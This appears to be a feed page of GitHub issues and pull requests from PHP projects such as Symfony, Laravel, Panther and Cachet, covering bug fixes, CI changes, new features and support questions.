The issue suggests adding 'form' next to xml and csv in AbstractObjectNormalizer::denormalize(). That would change the Serializer's behaviour globally for a format it doesn't own, while the resolver already had the mechanism — it was simply defeated by the uploaded files.

Note on the trigger

The bug only shows up when a file is really uploaded. Without a file the payload is all strings, hasNonStringScalar() returns false, and the conversion works. The two added tests differ only by that file:

  • testMapRequestPayloadWithUploadedFileConvertsScalars fails without the patch (ValidationFailedException: skuNumber)
  • testMapRequestPayloadWithoutUploadedFileConvertsScalars passes before and after, and pins the case down

Both need a ReflectionExtractor on the ObjectNormalizer: without a type extractor no type is enforced at all and PHP silently coerces the values, which is what makes this bug invisible in a naive test.

HttpKernel goes from 1663 to 1665 tests, no other change.

Base branch

hasNonStringScalar() exists since 6.4, but mergeParamsAndFiles() — which puts the objects into the payload — landed in 8.1. No object reached that function before, hence 8.1.

View more
Amoifr

Amoifr

10th Jul 2026 @ 15:27

I'm creating this issue to trigger a discussion around how we want the maker bundle to generate entities. Until now, entities always store private properties and add accessors to manipulate the values. While this provides a fluent interface for setters, it's also somewhat of an anti-pattern, especially in modern PHP. There were multiple reasons why one would not want to expose properties in classes, instead using getters and various modifier methods:

  • accessors needing to contain logic, e.g. validation
  • asymmetric access (e.g. for the identifier which does not have a setter)
  • more expressive methods, e.g. addSomething and removeSomething with typed parameters instead of working through the generic collection
  • future-proofing, i.e. "let me add setters and getters in case I need to add logic later"

While all this may have been a best practice in the past, there are multiple reasons why we no longer need to do this:

  • With property hooks, we can transparently add logic to property access after the fact, negating the need for dedicated setters and getters
  • Asymmetric visibility is supported on the property level, negating the need for getters for unmodifiable properties
  • Refactoring tools can be used instead of future-proofing in cases where property access needs to be changed to calling a method

My suggestion would be to change the maker to no longer generate setters and getters for properties, but since this is quite a big change, I wanted to get some input on this first. There are also a few special cases that might need discussing. I've prototyped some changes locally, and here's what I found so far: we can relatively easily remove accessors for most properties and make them public. This doesn't necessarily create a BC break but we may want to make the behaviour opt-in. We would have to bump the PHP requirement to PHP 8.4, as the identifier would need to have a private(set) modifier to replicate current behaviour. Where it gets tricky are the various relationships. The current methods handle things like updating the inverse side of a relationship (i.e. calling setOwner on $child when $owner->addChild($child) is called). This can't be done through property hooks, but would have to be handled in the corresponding collection instance. The problem is that this instance may not yet be aware of this requirement, as only a PersistentCollection knows about mappings and inverse sides, while the ArrayCollection created when the entity instance is created outside of Doctrine has no idea of mappings or anything. Last but not least, we would still want a private(set) modifier for collection properties by default to ensure that the collection instance itself can't be replaced, as that may trigger really unwanted behaviour.

I would create a pull request for changing "normal" properties (i.e. identifier and anything that isn't an association) to public and omitting setters and getters, but would like to know if we should make this the new default behaviour or whether we should add some kind of BC layer. For associations, I'm appreciative of any input people have with how these should behave by default.

View more
3 comments 👍 9
alcaeus

alcaeus

7th Jan 2026 @ 10:55

Noticed this earlier via this, jobs pushed via Bus::batch() and Bus::bulk already respect $delay as a property, but, they ignore the Delay attribute.

This PR ensures the attribute is also covered.

The SQS driver was already doing a is_object check, so I've replicated elsewhere.

This mean each Queue class checks the attribute / param now basically.

This means it fixes the below:

    dispatch(new DelayParamJob); // delayed 
    Bus::batch([new DelayParamJob])->dispatch(); // delayed 
    Queue::bulk([new DelayParamJob]); // delayed 
    
    dispatch(new DelayAttrJob); // delayed 
    Bus::batch([new DelayAttrJob])->dispatch(); // not delayed
    Queue::bulk([new DelayAttrJob]); // not delayed
    
    
    
class DelayPropertyJob implements ShouldQueue
{
    use Batchable, Queueable;

    public function __construct()
    {
        $this->delay = 60;
    }
}

#[Delay(60)]
class DelayAttributeJob implements ShouldQueue
{
    use Batchable, Queueable;
}

This isn't officially documented, but feels odd to support only the param and not the attr? (As many people are changing from params to attr)

I think this also ensures there's no fifo etc issues, as the drivers are already responsible for this 🫡

Open to your feedback, maybe this sux? thanks!

View more
1 comment
jackbayliss

jackbayliss

13th Jul 2026 @ 22:14

Bug Status: Reviewed ObjectMapper
Q A
Branch? 7.4
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64762
License MIT

A per-property #[Map(source: '...')] was only honored when the target property name was not readable on the source object:

$sourcePropertyName = $propertyName;
if ($mapping->source && !$this->isReadable($source, $propertyName)) {
    $sourcePropertyName = $mapping->source;
}

So when the source happened to expose a property with the same name as the target one, the explicit source was silently discarded and the same-named property was read instead. This also meant a property path such as #[Map(source: 'reason.description')] never got a chance to be resolved by the PropertyAccessor whenever the source had a reason property.

class Source
{
    public string $reason = 'from-reason';
    public string $reasonText = 'from-reasonText';
}

#[Map(source: Source::class)]
class Target
{
    public function __construct(#[Map(source: 'reasonText')] public string $reason)
    {
    }
}

(new ObjectMapper())->map(new Source(), Target::class)->reason; // 'from-reason', expected 'from-reasonText'

Why not give source unconditional precedence

The issue suggests $sourcePropertyName = $mapping->source ?? $propertyName;. That passes the whole existing test suite, but it breaks the reverse direction, which is currently untested: when the metadata is read from the source object, source describes the reverse mapping and must not be resolved against the source itself. Taking the existing MapTargetToSource fixtures, mapping B (which carries #[Map(source: 'source')] on its own $target property) to another class then fails with NoSuchPropertyException: The property "source" does not exist on "B".

So the fix keys off the distinction the code already makes — whether metadata was read from the target or from the source:

$readMetadataFromTarget = $refl === $targetRefl;
...
$sourcePropertyName = $readMetadataFromTarget ? $mapping->source ?? $propertyName : $propertyName;

Tests

  • testExplicitSourceTakesPrecedenceOverSameNamedProperty and testExplicitSourceSupportsPropertyPath fail without the fix.
  • testMapTargetToSourceIsIgnoredWhenMappingFromTheSource passes both before and after; it is there to lock the reverse-mapping behaviour, which the naive one-liner would silently break.

Note

One visible behaviour change: #[Map(source: 'a.b')] used without a PropertyAccessor now throws an explicit NoSuchPropertyException, where it previously read the same-named property and typically blew up later with a TypeError in the target constructor.

I could not confirm the regression between symfony/object-mapper v8.0.9 and v8.0.14 mentioned in the issue: the reproducer fails identically on v8.0.9, so this looks like a long-standing bug rather than a recent regression.

View more
Amoifr

Amoifr

9th Jul 2026 @ 14:56

Currently we have the excluded_http_codes setting, which defaults per recipe to [404, 405] (https://github.com/symfony/recipes/blob/main/symfony/monolog-bundle/3.7/config/packages/monolog.yaml#L39) for regular logging.

This is weird behavior when considering the HTTP spec, and by proxy therefore even a Denial of Service loophole, as the entire 4xx class of errors can by definition be caused at will by external parties. Malformed requests give 400 Bad Request, but when building APIs also 416 Range not Satisfiable and 422 Unprocessable content. This allows attackers to flood a server's disk with logs, causing downtime. Most HTTP 4xx errors can be trivially triggered externally on API servers.

Similarly bad, when using Monolog to escalate to targets like email, Slack etc. you definitely want to exclude the entire 4xx range of errors, as the HTTP specs explicitly state that those errors are expected and repeatable: if a client does not modify its request after a 4xx response it is nearly always expected to get the same result (excluding 429 Too Many Requests, and code changes in the meantime).

Current default behavior allows malicious external parties to flood server storage, mailboxes, Slack channels, logging tools remotely at will. That's bad.

For such handlers we definitely need to implement an exclude_http_client_errors setting, which drops all error codes between 400 and 500.

(yes I am aware that this would need to be implemented in the monolog bridge first but it's optically a feature of the bundle, so discussing here)

View more
2 comments
curry684

curry684

16th Mar 2026 @ 10:03

Environment:

  • PHP 8.4
  • Symfony 8.0
  • Panther 2.4
  • Docker Image: php:8.4-cli-alpine3.23

My tests are failing on alpine3.23 and working fine on on alpine3.22, any idea why?

Failing on:

  • php:8.4-fpm-alpine3.23
  • php:8.4-cli-alpine3.23

Working on:

  • php:8.4-fpm-alpine3.22
  • php:8.4-cli-alpine3.22

All the other tests are passing, just the ones using Panther started to fail.

View more
FabianoLothor

FabianoLothor

22nd Mar 2026 @ 00:17

Status: Needs Review
Q A
Bug fix? no
New feature? no
Docs? no
Issues -
License MIT

CI installed every package on its own — ~419 jobs and ~600 composer installs per PR. PHPStan and PHPUnit only need an autoloader, so most of that install work was redundant. This reworks the pipeline around a single shared install per resolution axis.

Changes

  • Workspace install for PHPStan & PHPUnit.github/build-workspace.php generates one root composer.json (all 93 packages via path repos + the union of their third-party require/require-dev + their autoload-dev). Both tools run against that single install.
  • Per-package vendor shim — each package's vendor/ is reduced to the two paths the configs resolve (autoload.php, phpstan), avoiding the symlink cycle isolate-bridge used to work around.
  • Parallel per-package runner.github/run-in-packages.sh runs every package in parallel with buffered, grouped output and per-package failure attribution; PHPStan failures annotate inline at file:line.
  • Grouped --prefer-lowest jobs — the lowest matrix (which genuinely can't share an install) collapses from 93 jobs into 6 component groups via .github/run-lowest.sh; components install in place, bridges are copied to a depth-preserving scratch tree, installs run serially against the warm cache.
  • Isolated PHPStan tmp dir — each parallel package gets its own TMPDIR (PHPStan's container cache is shared and 32 bridges have byte-identical configs).
  • Removed dead steps/scriptssqlite-vec installs that couldn't take effect (bridge loads it only on PHP ≥ 8.4; integration job's Sqlite never enters that matrix), the unreferenced .github/workflows/.utils.sh, and the unused build-matrix.yaml outputs (now only the store-integration list).

Before / after

Metric Before After
Jobs 419 46
Compute (job-minutes) ~197 ~41
composer installs ~600 ~15
Code Quality wall clock 185s 97s
Tests wall clock 301s 183s

Kept per-package (on purpose)

  • --prefer-lowest: a merged install resolves to the highest of all per-package floors (Mate allows symfony/console ^5.4, Platform requires ^7.3), so it's grouped but never merged.
  • Mate on Symfony 5.4/6.4, and the store integration / demo / examples jobs — each needs its own install.
View more
3 comments
chr-hertel

chr-hertel

10th Jul 2026 @ 12:58

Status: Needs Review Chartjs LiveComponent Notify React StimulusBundle Turbo TwigComponent Vue Deprecation

Introduce ux_<package> prefixed aliases for all Twig functions and filters across Symfony UX packages, and deprecate the old names to establish a consistent naming convention (following the pattern already used by ux_icon, ux_map, ux_is_native).

Q A
Bug fix? no
New feature? no
Deprecations? yes
Documentation? no
Issues Fix #...
License MIT
View more
1 comment
seb-jean

seb-jean

16th May 2026 @ 04:50

Internal Server Error

PUT status.neiki.dev
PHP 8.3.16 — Laravel 11.39.1
Method Cachet\Http\Controllers\Api\MetricPointController::update does not exist.
vendor/laravel/framework/src/Illuminate/Routing/Controller.php :68
vendor/laravel/framework/src/Illuminate/Routing/Controller.php :54
vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php :44

I tried to put metrics points via put (apikey etc set and metric exists)

Also i am wondering why the error page shows database queries? is that normal i mean it shows a bunch of information cant that be used for malicious purposes?

const options = {
  method: 'PUT',
  headers: {Authorization: 'REDACTED'},
};


fetch("https://status.neiki.dev/api/metrics/4/points/1", options)
  .then(response => response.text())
  .then(response => console.log(response))
  .catch(err => console.error(err));
View more
14 comments
NeikiDev

NeikiDev

7th Mar 2025 @ 13:05

View more
zayedadel

zayedadel

25th Feb 2026 @ 06:08

enhancement

Note: I am not looking for a community member to build this feature, it will be handled by myself or another member of the Filament core team when we have availability.

View more
danharrin

danharrin

11th Jul 2026 @ 13:42

This is the modern solution to automatically update timestamps in Doctrine. I have added createdAt and updatedAt to all entities using LifecycleCallbacks.

View more
2 comments
Mecanik

Mecanik

20th Oct 2023 @ 06:09

Hello,

I'm encountering an issue while trying to run a Symfony Messenger command that utilizes Panther to perform tests. The error message I receive is:

[CRITICAL] CONSOLE Error thrown while running command "ProcessCommand". Message: "Tried to run command without establishing a connection" command="ProcessCommand"

Here's the context:

Goal I want to dispatch a Symfony Messenger message (RunCommandMessage) to execute the ProcessCommand in the background. The command fetches URLs and processes them using Panther.

Code Overview

In my controller : $this->messageBus->dispatch(new RunCommandMessage('ProcessCommand'));

The Command class ProcessCommand extends Command
{
private $urlService;
private $pantherService;
private $entityManager;
private $crawlerService;
private $client;

protected static $defaultName = 'ProcessCommand';  

public function __construct(UrlService $urlService, PantherService $pantherService, EntityManagerInterface $entityManager, CrawlerService $crawlerService)  
{  
    $this->urlService = $urlService;  
    $this->pantherService = $pantherService;  
    $this->entityManager = $entityManager;  
    $this->crawlerService = $crawlerService;  
    parent::__construct();  
}  

protected function configure(): void  
{  
    $this->setDescription('Run automatic tests.');  
}  

protected function execute(InputInterface $input, OutputInterface $output): int  
{  
    $client = $this->pantherService->getPantherClient();  
    $url = 'https://example.com';  

    // Fetch the URL  
    $crawler = $client->request('GET', $url);  
    $this->document = $this->crawlerService->fetchPage($url);  

    return Command::SUCCESS;  
}  

}

The PantherService class PantherService extends PantherTestCase
{
private ?Client $client = null;
private Crawler $crawler;

public function __construct()  
{  
    $this->checkAndKillFirefoxProcesses();  
    $this->client = Client::createFirefoxClient(options: ['port' => 4444]);  
}  

public function requestPage(string $url): Crawler  
{  
    $this->crawler = $this->client->request('GET', $url);  
    return $this->crawler;  
}  

public function getPantherClient(): Client  
{  
    $availablePort = $this->getAvailablePort();  
    $this->client = Client::createFirefoxClient(  
        options: [  
            'port' => $availablePort,  
        ],  
    );  

    return $this->client;  
}  

private function getAvailablePort(): int  
{  
    $socket = socket_create_listen(0);  
    socket_getsockname($socket, $address, $port);  
    socket_close($socket);  
    return $port;  
}  

}

private function checkAndKillFirefoxProcesses() { // Vérifie les processus firefox $processList = []; exec('ps aux | grep [f]irefox', $processList); // Ajout de [f] pour éviter de capturer la commande grep elle-même

    // Récupère tous les PID pour firefox
    $firefoxPids = [];
    foreach ($processList as $process) {
        preg_match('/\b(\d+)\b/', $process, $matches);
        if (!empty($matches[1])) {
            $firefoxPids[] = $matches[1];  // Enregistre le PID de firefox
        }
    }

    // Ne tuer que si plusieurs processus sont trouvés (laissez toujours deux processus)
    if (count($firefoxPids) > 2) {
        array_splice($firefoxPids, 0, 2); // Laissez les deux premiers processus en cours
        foreach ($firefoxPids as $pid) {
            // Vérifie si le processus existe avant de le tuer
            if ($this->processExists($pid)) {
                exec("kill -9 $pid");  // Force kill le processus
            }
        }
    }

    // Vérifie les processus geckodriver
    $processList = [];
    exec('ps aux | grep [g]eckodriver', $processList);  // Ajout de [g] pour éviter de capturer la commande grep elle-même

    // Récupère tous les PID pour geckodriver
    $geckoDriverPids = [];
    foreach ($processList as $process) {
        preg_match('/\b(\d+)\b/', $process, $matches);
        if (!empty($matches[1])) {
            $geckoDriverPids[] = $matches[1];  // Enregistre le PID de geckodriver
        }
    }

    // Ne tuer que si plusieurs processus sont trouvés (laissez toujours deux processus)
    if (count($geckoDriverPids) > 2) {
        array_splice($geckoDriverPids, 0, 2); // Laissez les deux premiers processus en cours
        foreach ($geckoDriverPids as $pid) {
            // Vérifie si le processus existe avant de le tuer
            if ($this->processExists($pid)) {
                exec("kill -9 $pid");  // Force kill le processus
            }
        }
    }

}

The Issue The error "Tried to run command without establishing a connection" appears when the command is executed. I suspect it is related to the Panther client initialization or the connection to Firefox.

What I Tried Ensured that Geckodriver is running and correctly set up. Verified that the port (4444) is available and not in use by other processes. Used Client::createFirefoxClient() directly in the service without dynamic port assignment, but the error persists.

When I manually execute the command (php bin/console ProcessCommand) from the terminal, it works perfectly. However, when the same command is dispatched via the Symfony Messenger and executed by the Messenger worker, I get the above error.

Questions Is there something wrong with how I initialize the Panther client in the PantherService? Could the Messenger worker context cause the issue with the Firefox client connection? How can I properly establish and maintain the Panther client connection within the Symfony Messenger context? Any insights or suggestions would be greatly appreciated! Thank you!

View more
Ooogeid

Ooogeid

10th Jan 2025 @ 13:39

Q A
Branch? 1.x
Bug fix? no
New feature? yes
Deprecations? no
Issues -
License MIT

The proposed PHP 8.6 "Serializable closures" engine support (implementation at nicolas-grekas/php-src#4) gives every closure declared in an attribute argument or in a parameter default value a canonical per-class id, derived from a deterministic, non-evaluating walk over the class's constant expressions, exposed as ReflectionFunction::getConstExprId() and resolved by Closure::fromConstExpr(). This PR makes the polyfill use those ids, gated on \PHP_VERSION_ID >= 80600, assuming the RFC lands.

  • Encoding. On PHP 8.6, deepclone_to_array() emits [class, id, line] under the existing mask marker, from a single getConstExprId() call. Everything that existed only because userland could not see closure identity stops being needed for these sites: the per-class evaluated index, the name/file/line/signature keys, the token-level aliasing guard, and the documented refusals all become moot, since same-line literals get distinct ids and no source files are read. Closures declared in class constant values and in property default values are evaluated in place by the engine and have no id; they keep the site-based 5-element form (and, on 8.6, the index lookup ignores attribute and parameter-default candidates, which can only be stale line-mates there).
  • Decoding. deepclone_from_array() accepts both forms on every PHP version, discriminated by the type of element 1 (int id vs string site). Site-based payloads written on PHP 8.5 keep resolving on PHP 8.6, so caches survive the upgrade; engine-id payloads on older PHP fail with a message saying they need PHP 8.6. Resolution goes through Closure::fromConstExpr() plus the same staleness check as before (stale payload when the declaration line moved). Crafted payloads addressing a first-class-callable site are rejected; FCCs keep the named-closure form. The allow-list gates are unchanged on both sides, including the payload-class check before autoloading.
  • Runtime closures now surface the engine's own Closure::__serialize() refusal (Serialization of 'Closure' is not allowed) instead of NotInstantiableException, matching what serialize() itself says on 8.6.

Measured on the patched engine (release build): encoding an attribute closure goes from 3.2 us to 1.6 us with no more ~30 us cold per-class index, and decoding from 2.5 us to 1.2 us; both implementations now also outperform native serialize()/unserialize() of the same closures, which carry the wrapping format.

Payloads stay byte-identical and interchangeable with the extension, now covered by an in-suite interchange test that runs when the extension is loaded. The suite passes on PHP 8.5 (current behavior unchanged) and on the patched 8.6 build with the extension compiled in, on both the native and polyfill legs.

Companion extension implementation: symfony/php-ext-deepclone#24

Expected CI failures until dependencies ship: the 8.2-8.5 lanes with the extension enabled fail on the two new payload-validation tests because they install the latest tagged extension, which predates the engine-id form; they go green once symfony/php-ext-deepclone#24 is released (same sequence as #630/#632). The 8.6 lanes run php-src master, which does not include the engine patch yet, so ReflectionFunction::getConstExprId() is undefined there; they go green once the engine implementation lands.

View more
nicolas-grekas

nicolas-grekas

10th Jun 2026 @ 21:39

View more
❤️ 1
zairigimad

zairigimad

24th Apr 2026 @ 16:01

Hello @jbrooksuk

I really want to know when Cachet v3. x will be released officially.

View more
👍 4
arkhalid1986

arkhalid1986

4th Jun 2026 @ 07:41

Platform Feature Status: Needs Review
Q A
Bug fix? no
New feature? yes
Docs? no - TODO
Issues
License MIT

Hello :wave:

This PR introduces the Agent Client Protocol (ACP) platform bridge (symfony/ai-acp-platform), enabling Symfony AI to communicate with any ACP-compatible agent (GitHub Copilot, Claude Code, JetBrains Junie, OpenCode, Google Gemini CLI, etc.).

ACP is an open standard designed to facilitate communication between AI coding agents and code editors/IDEs (created by Zed and JetBrains).

This bridge allows Symfony AI to connect to any ACP-compatible agent.

For example, if you have a subscription to Junie , you don't have any API_KEY to call a model, but you can launch junie --acp true that let's you call the agent through stdio, and the agent can perform tasks on the folder.

Some agents allow to use a socket to communicate with like copilot

$ copilot --acp --port 3000

The platform can start the stdio process, or attach to the tcp socket to communicate.

Beside, depending the agent, it can use terminal, some tools. There is, AFAIK, not yet the possibility to change the model used by the agent, but it can be changed when we start the process.

Example

$platform = Factory::createPlatform(
    command: 'opencode acp', // or "junie --acp true", "gemini --acp" ...
);

$messages = new MessageBag(
    Message::ofUser('Explain the architecture of this project in 3 sentences.'),
);

$result = $platform->invoke('acp-v1', $messages);

echo $result->asText().\PHP_EOL;

Configuration (ai-bundle)

# config/packages/ai.yaml
ai:
    platform:
        acp:
            transport: 'process' # 'process' | 'socket'
            command: 'opencode acp' # required for process
            # host: 'localhost' # required for socket
            # port: 3000 # required for socket

I tried (me and opencode) as much as possible to stick with others bridge, but I may miss some things.

Tell me if there is any interest to get this into symfony/ai :slightly_smiling_face:

View more
2 comments
Jibbarth

Jibbarth

12th Jul 2026 @ 17:01

Fixes #56647

The problem

Calling Sleep inside a queued job can wake up early. For example:

public function handle(): void
{
    Log::debug('Should sleep for 60 seconds');

    Sleep::for(60)->seconds();

    Log::debug('Should be awake now'); // logged well before 60s have elapsed
}

The job logs "Should be awake now" before the full 60 seconds have passed. The same code sleeps correctly outside of a queue worker.

Root cause

Sleep::goodnight() performs the actual sleeping:

if ($seconds > 0) {
    sleep($seconds);

    $remaining = $remaining->subSeconds($seconds);
}

PHP's sleep() returns the number of seconds left to sleep if the call is interrupted by a signal (otherwise it returns 0). Queue workers — Horizon in the reported case — routinely deliver pcntl signals (timeout alarms, restart/termination signals, etc.). When one arrives mid-sleep, sleep() returns early, but goodnight() ignores the return value and assumes the whole duration was slept, so the remaining time is silently skipped.

This is straightforward to reproduce: an alarm scheduled with pcntl_alarm(1) interrupts sleep(3), which then returns 2 and elapses only one second.

The fix

Keep sleeping with the seconds that sleep() reports as remaining until the full duration has actually elapsed:

$secondsToSleep = $seconds;

while ($secondsToSleep > 0) {
    $secondsToSleep = sleep($secondsToSleep);
}

sleep() returns 0 on success and false on error — both end the loop — so an uninterrupted sleep behaves exactly as before. Only the interrupted case changes: it now resumes instead of returning early.

Tests

Added testItKeepsSleepingWhenInterruptedBySignal, which schedules a signal to interrupt a two-second sleep after one second and asserts the total elapsed time is still at least two seconds. It fails before this change (wakes after ~1s) and passes after it. The test skips automatically when the pcntl extension is unavailable.

The full tests/Support suite passes.

View more
2 comments
dhrupo

dhrupo

27th Jun 2026 @ 13:18

Summary

This PR adds Laravel Boost support for spatie/laravel-data by introducing package-provided AI guidelines, examples, and reference documentation.

What changed

  • Added a new Laravel Boost skill: laravel-data-development.

  • Added Boost guidelines for using Laravel Data in Laravel applications.

  • Added practical examples covering:

    • request Data classes
    • response Data classes
    • nested Data objects
    • Data collections
    • Inertia/Vue usage
    • TypeScript generation
    • Pest testing
  • Added reference documentation with official Laravel Data and Laravel Boost links.

  • Added a new documentation page for Laravel Boost support.

  • Updated the README with Laravel Boost installation, update, and discovery instructions.

Why

Laravel Boost allows packages to provide AI-readable guidelines and skills. This helps AI agents generate Laravel Data code that follows the package’s intended usage patterns, including typed request/response contracts, validation, nested data, collections, Inertia props, TypeScript generation, and testing guidance.

Files added/updated

  • README.md
  • docs/advanced-usage/laravel-boost.md
  • resources/boost/skills/laravel-data-development/SKILL.md
  • resources/boost/skills/laravel-data-development/guidelines/core.blade.php
  • resources/boost/skills/laravel-data-development/examples/examples.md
  • resources/boost/skills/laravel-data-development/references/references.md

Testing

Documentation-only change.

No automated tests were added or run.

View more
2 comments
herovish143

herovish143

28th May 2026 @ 10:16

This PR adds an expire_after_timeout option to the Redis and database queue drivers. When enabled, jobs expire 10 seconds after their timeout, instead of naively based on retry_after.

Quick recap on how job timeouts, expiration, and retries work:

  • Jobs with $tries = 1 fail instantly when they time out
  • Jobs with $tries > 1 get killed when they time out. The queue starts the next attempt when the previous attempt has expired.

Currently, jobs always expire retry_after seconds after they're started, which causes two problems:

  • retry_after must be longer than your longest-running job. If it's shorter, the job gets retried while it's still running, so it ends up running twice at once.
  • I've worked on multiple projects where retry_after was set to 1 hour. That meant a short job that timed out would sit for a full hour before retrying. Even worse, nothing gets logged when this happens, so the job essentially disappears for an hour (which is not fun to debug).

Enabling expire_after_timeout fixes both these problems, and in most cases it removes the need for retry_after entirely. retry_after is now only used for jobs that run without a timeout (e.g. $timeout = 0).

retry_after and the new expire_after_timeout are only used by the Redis and database queue drivers:

  • The Redis driver currently stores now + retry_after as the job expiration. With expire_after_timeout enabled it stores now + timeout + 10
  • The database driver uses a reserved_at column that gets set to now when a worker picks up the job. With expire_after_timeout enabled it's now + timeout + 10 - retry_after. This works nicely with the existing query that finds expired jobs via reserved_at <= now - retry_after (it does make the reserved_at name misleading, but I think that's fine)

This PR is backwards compatible and the feature is disabled by default, nothing changes for existing applications when this is merged. A small follow-up PR for Horizon is needed to enable this flag there too.

View more
1 comment 👍 1
SjorsO

SjorsO

13th Jul 2026 @ 07:24

Bug Documentation Status: Needs Review Feature
Q A
Bug fix? no
New feature? yes
Deprecations? no
Documentation? yes
Issues Fix#https://github.com/symfony/ux/issues/7 Fix #https://github.com/symfony/ux/issues/2567
License MIT

Adds proper multiple support to UX Dropzone.

A native <input type="file" multiple> replaces its selection on every pick and offers no way to remove a single file, so the Stimulus controller now owns the selection in a DataTransfer: it accumulates files across successive picks (files with the same name, size and updatedAt are seen as the same file and not added more than once), writes the result back to input.files so the form still submits everything, previews each file, and lets the user remove files individually.

Behavior is triggered by enabling the Typesmultiple option (from FileType).

Usage:

$builder->add('photos', DropzoneType::class, [
    'multiple' => true,
]);

A dropzone:remove event (the removed File in event.detail) has been added.

Tests: vitest (accumulate / dedupe / remove), a Playwright browser test using real setInputFiles, and a PHP render test for the multiple markup.

View more
1 comment
Dooij

Dooij

19th Jun 2026 @ 17:24

Fixes #1034

FrankenPHP's built in watcher does not support polling. If --poll is passed, the watcher should fallback to chokidar. This fixes setups where the repo might be in a mount like the windows mount on wsl.

@IranMine123 can you try if this branch makes --watch --poll work for you on WSL?

View more
6 comments
AlliBalliBaba

AlliBalliBaba

24th Feb 2026 @ 22:55

While testing I stumbled over #466 again with errors like:

Failed to connect to 127.0.0.1 port 9515 after 0 ms: Couldn't connect to server in /builds/[...]/app/vendor/php-webdriver/webdriver/lib/Exception/Internal/WebDriverCurlException.php on line 20

I mentioned that the WebDriverCurlException doesn't inherit from WebDriverException and therefore wasn't caught.

While digging in the code, I'v found that php-webdriver/webdriver introduced a common exception interface in 1.14.0 (from 2023-02-09), so I though its safe/mature enough to bump the dependency version.

I also found out that if destructing of the Client fails, the BrowserManager will not quit, so I moved the exception handling for the webdriver exceptions into the actual quit method.

View more
Basster

Basster

6th Jun 2025 @ 13:29

Is your feature request related to a problem? Please describe.

~\Repos\starshop git:[master]
composer requre serializer

                                    
  Command "requre" is not defined.  
                                    

 Do you want to run "require" instead?  (yes/no) [no]:
 > yes

Could not find package serializer.
Pick one of these or leave empty to abort:
  [0] jms/serializer
  [1] liip/serializer
  [2] symfony/serializer
  [3] jms/serializer-bundle
  [4] zumba/json-serializer
 >

                       
  Value "" is invalid  
                       

require [--dev] [--dry-run] [--prefer-source] [--prefer-dist] [--prefer-install PREFER-INSTALL] [--fixed] [--no-suggest] [--no-progress] [--no-update] [--no-install] [--no-audit
] [--audit-format AUDIT-FORMAT] [--update-no-dev] [-w|--update-with-dependencies] [-W|--update-with-all-dependencies] [--with-dependencies] [--with-all-dependencies] [--ignore-p
latform-req IGNORE-PLATFORM-REQ] [--ignore-platform-reqs] [--prefer-stable] [--prefer-lowest] [-m|--minimal-changes] [--sort-packages] [-o|--optimize-autoloader] [-a|--classmap-authoritative] [--apcu-autoloader] [--apcu-autoloader-prefix APCU-AUTOLOADER-PREFIX] [--] [<packages>...]

Describe the solution you'd like When I select:

Do you want to run "require" instead?  (yes/no) [no]:
 > yes

"require" should recognise the alias as it does when run normally. i.e.:

~\Repos\starshop git:[master]
composer require serializer
./composer.json has been updated
Running composer update symfony/serializer-pack
Loading composer repositories with package information
Restricting packages listed in "symfony/symfony" to "7.2.*"
Updating dependencies
Lock file operations: 11 installs, 0 updates, 0 removals
  - Locking doctrine/deprecations (1.1.5)
  - Locking phpdocumentor/reflection-common (2.2.0)
  - Locking phpdocumentor/reflection-docblock (5.6.2)
  - Locking phpdocumentor/type-resolver (1.10.0)
  - Locking phpstan/phpdoc-parser (2.1.0)
  - Locking symfony/property-access (v7.2.7)
  - Locking symfony/property-info (v7.2.5)
  - Locking symfony/serializer (v7.2.7)
  - Locking symfony/serializer-pack (v1.3.0)
  - Locking symfony/type-info (v7.2.5)
  - Locking webmozart/assert (1.11.0)
Writing lock file
Installing dependencies from lock file (including require-dev)
Package operations: 11 installs, 0 updates, 0 removals
  - Downloading phpstan/phpdoc-parser (2.1.0)
  - Downloading phpdocumentor/reflection-common (2.2.0)
  - Downloading doctrine/deprecations (1.1.5)
  - Downloading phpdocumentor/type-resolver (1.10.0)
  - Downloading symfony/serializer (v7.2.7)
  - Downloading symfony/type-info (v7.2.5)
  - Downloading symfony/property-info (v7.2.5)
  - Downloading symfony/property-access (v7.2.7)
  - Downloading webmozart/assert (1.11.0)
  - Downloading phpdocumentor/reflection-docblock (5.6.2)
  - Downloading symfony/serializer-pack (v1.3.0)
  - Installing phpstan/phpdoc-parser (2.1.0): Extracting archive
  - Installing phpdocumentor/reflection-common (2.2.0): Extracting archive
  - Installing doctrine/deprecations (1.1.5): Extracting archive
  - Installing phpdocumentor/type-resolver (1.10.0): Extracting archive
  - Installing symfony/serializer (v7.2.7): Extracting archive
  - Installing symfony/type-info (v7.2.5): Extracting archive
  - Installing symfony/property-info (v7.2.5): Extracting archive
  - Installing symfony/property-access (v7.2.7): Extracting archive
  - Installing webmozart/assert (1.11.0): Extracting archive
  - Installing phpdocumentor/reflection-docblock (5.6.2): Extracting archive
  - Installing symfony/serializer-pack (v1.3.0): Extracting archive
Generating autoload files
43 packages you are using are looking for funding.
Use the `composer fund` command to find out more!

Symfony operations: 1 recipe (4d2aac3bc887cdb6faf67be1d9612967)
  - Configuring doctrine/deprecations (>=1.0): From github.com/symfony/recipes:main
Unpacking Symfony packs
  - Unpacked symfony/serializer-pack
Loading composer repositories with package information
Pattern "php" listed for update matches platform packages, but these cannot be updated by Composer.
Updating dependencies
Nothing to modify in lock file
Writing lock file
Installing dependencies from lock file (including require-dev)
Package operations: 0 installs, 0 updates, 1 removal
  - Removing symfony/serializer-pack (v1.3.0)
Generating autoload files
42 packages you are using are looking for funding.
Use the `composer fund` command to find out more!

Run composer recipes at any time to see the status of your Symfony recipes.

Executing script cache:clear [OK]
Executing script assets:install public [OK]

No security vulnerability advisories found.
              
 What's next? 
              

Some files have been created and/or updated to configure your new packages.
Please review, edit and commit them: these files are yours.

No security vulnerability advisories found.

Describe alternatives you've considered If the user knows which package their alias refers to, they can easily install it with the current functionality. This is only a problem for users who don't know which package their alias refers to.

Additional context N/A

View more
1 comment
kudosscience

kudosscience

17th Jun 2025 @ 08:55

help wanted findapr

Immediately after installing php-flasher/flasher-laravel, the application breaks with the following error:

foreach() argument must be of type array|object, bool given Simply installing the package causes this fatal error.

Steps to Reproduce:

Create a fresh Laravel app.

Run:

composer require php-flasher/flasher-laravel

Load any page in the app — no usage of flasher() or flasher_render() yet.

Laravel crashes with a foreach() error.

View more
8 comments
dlopez525

dlopez525

11th Apr 2025 @ 18:20

I am having this errors, not sure how to fix this:

$encore dev watch
Running webpack ...

